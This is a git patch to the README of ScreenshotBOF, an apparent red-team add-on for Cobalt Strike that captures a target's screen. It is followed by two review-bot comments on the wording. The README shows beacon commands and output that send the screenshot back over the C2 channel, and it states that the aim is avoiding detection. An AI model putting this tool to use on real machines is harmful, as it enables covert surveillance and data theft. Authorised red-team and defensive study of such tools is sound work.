From 7e0ee92cc4daa15c422860eed7f2e16a47f833dc Mon Sep 17 00:00:00 2001 From: CodeXTF2 Date: Wed, 26 Oct 2022 00:35:38 +0800 Subject: [PATCH] readme --- README.md | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index 48d8d90..f868b51 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # ScreenshotBOF -An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory. ## Self Compilation 1. git clone the repo 
@@ -9,33 +9,25 @@ An alternative screenshot capability for Cobalt Strike that uses WinAPI and does ## Usage 1. import the screenshotBOF.cna script into Cobalt Strike -2. use the command screenshot_bof -3. Download the screenshot from the target +2. use the command screenshot_bof {local filename} ``` -beacon> screenshot_bof +beacon> screenshot_bof sad.bmp [*] Running screenshot BOF by (@codex_tf2) -[+] host called home, sent: 3411 bytes +[+] host called home, sent: 4860 bytes [+] received output: -[*] Tasked beacon to printscreen and save to disk +[*] Tasked beacon to printscreen and save to sad.bmp [+] received output: [+] PrintScreen saved to bitmap... -[+] received output: -[+] Printscreen bitmap saved to screenshot.bmp -beacon> download screenshot.bmp -[*] Tasked beacon to download screenshot.bmp -[+] host called home, sent: 22 bytes -[*] started download of C:\screenshot.bmp (12441668 bytes) -[*] download of screenshot.bmp is complete +[*] started download of sad.bmp ``` ## Notes - no evasion is performed, which should be fine since the WinAPIs used are not malicious -- in memory downloading of screenshots is planned to be added -- the filename can be changed in the source code. ## Why did I make this? Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability. ## Credits - Made using https://github.com/securifybv/Visual-Studio-BOF-template -- Save BMP to file from https://stackoverflow.com/a/60667564 \ No newline at end of file +- Save BMP to file from https://stackoverflow.com/a/60667564 +- in memory download from https://github.com/anthemtotheego/CredBandit \ No newline at end of file
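Review bot: In the first hunk (README.md lines 1-6), the new description "Screenshot downloaded in memory." is ambiguous about where the bitmap ends up: it still uses the word "downloaded" alongside a usage section that later says "save to sad.bmp", so a reader cannot tell whether anything is written to the target's disk. State the behaviour explicitly, e.g. "The screenshot is sent back over the Beacon channel and written only on the team server; nothing is written to the target's disk", and mention that the command now takes a filename argument, since that is the other user-visible change in this patch.

Review bot: In the second hunk (README.md Usage, Notes and Credits), the sample output "[*] Tasked beacon to printscreen and save to sad.bmp" contradicts the in-memory claim the patch is introducing, because "save to" reads as a write on the target; if the string comes from the BOF or the .cna script, reword it (and the README) to something like "download as sad.bmp" so operators do not assume a disk artifact was left behind. The `{local filename}` placeholder should also say where the file appears on the operator side (the Cobalt Strike downloads view) and that it is a raw BMP. The credit "Save BMP to file from https://stackoverflow.com/a/60667564" is stale now that file saving was removed; if the BMP header/serialization code is still reused, rephrase it to "BMP serialization from ..." or drop it. Finally, the rewritten file still ends with "\ No newline at end of file"; add a trailing newline while touching this line.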